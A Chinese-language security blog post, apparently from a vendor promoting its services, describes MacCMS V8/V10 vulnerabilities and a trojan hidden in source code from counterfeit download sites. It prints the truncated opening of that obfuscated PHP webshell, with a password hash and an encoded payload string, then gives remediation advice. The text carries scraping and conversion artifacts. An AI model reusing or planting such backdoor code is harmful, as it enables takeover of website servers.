目前蘋果CMS官方在不斷的升級補丁,官方最新的漏洞補丁對於目前爆發的新漏洞沒有任何效果。更新補丁的用戶網站仍是會遭受到掛馬的攻擊,不少客戶所以找到咱們SINE安全尋求網站安全技術上的支持,針對該漏洞咱們有着獨特的安全解決方案以及防止掛馬攻擊的防禦,包括一些未公開的maccms POC漏洞都有修復補丁。php
目前maccms官方被百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 蘋果官方網站由於特殊緣由已經中止訪問,該內容被禁止訪問,可是升級補丁更新的網址仍是能夠打開的。html
截圖以下:前端
蘋果CMS漏洞詳情:web
蘋果CMS V8 V10版本存在代碼重裝漏洞,以及代碼後門漏洞,任意文件刪除漏洞,經過CNVD-2019-43865的信息安全漏洞通報,能夠確認maccms V10存在漏洞,能夠僞造惡意代碼發送到網站後端進行執行,能夠刪除網站目錄下的任意文件,可刪除重裝蘋果CMS系統的配置文件,致使能夠從新安裝maccms系統,並在安裝過程當中插入sql注入代碼到數據庫中去執行並獲取webshell以及服務器權限。sql
蘋果CMS V8 V10 源代碼存在後門漏洞,通過咱們SINE安全技術的檢測發現,存在後門的緣由是,目前百度搜索蘋果官網,maccms官方,排在百度搜索首頁的都是仿冒的網站,真正官網地址是www.maccms.com,包括模板,圖片,以及CSS跟真正的官方是如出一轍,不少客戶都是點擊到這個山寨網站上去進行下載的源代碼,該代碼裏隱藏了木馬後門文件,阿里雲都沒法檢測出來,shell
<?php數據庫
error_reporting(E_ERROR);後端
@ini_set('display_errors','Off');安全
@ini_set('max_execution_time',20000);服務器
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..
define('Viv, bebegim.','Denzel-你的英雄'); // 標題
function s(){
$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s
7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323
代碼如上面所示,是加密過的,通過咱們SINE安全的解密發現是PHP的腳本木馬,能夠繞過各大服務器廠商的安全檢測,包括阿里雲,騰訊雲,百度雲,華爲雲。
關於蘋果CMS網站漏洞的修復方案與辦法
對任意文件刪除漏洞作安全過濾與檢查,防止del刪除的語句的執行,對前端傳輸過來的參數進行嚴格的檢測,無論是get,post,cookies,若是您對代碼不是太懂的話也能夠找專業的網站安全公司來處理解決蘋果CMS網站被攻擊的問題,或者是對重裝文件進行更名以及安裝配置文件進行權限設置,只讀權限,對於存在網站木馬後門的蘋果cms系統,人工對代碼進行安全審計,對全部網站目錄下每一個代碼文件都要仔細的排查,能夠下載官方的源代碼進行比對。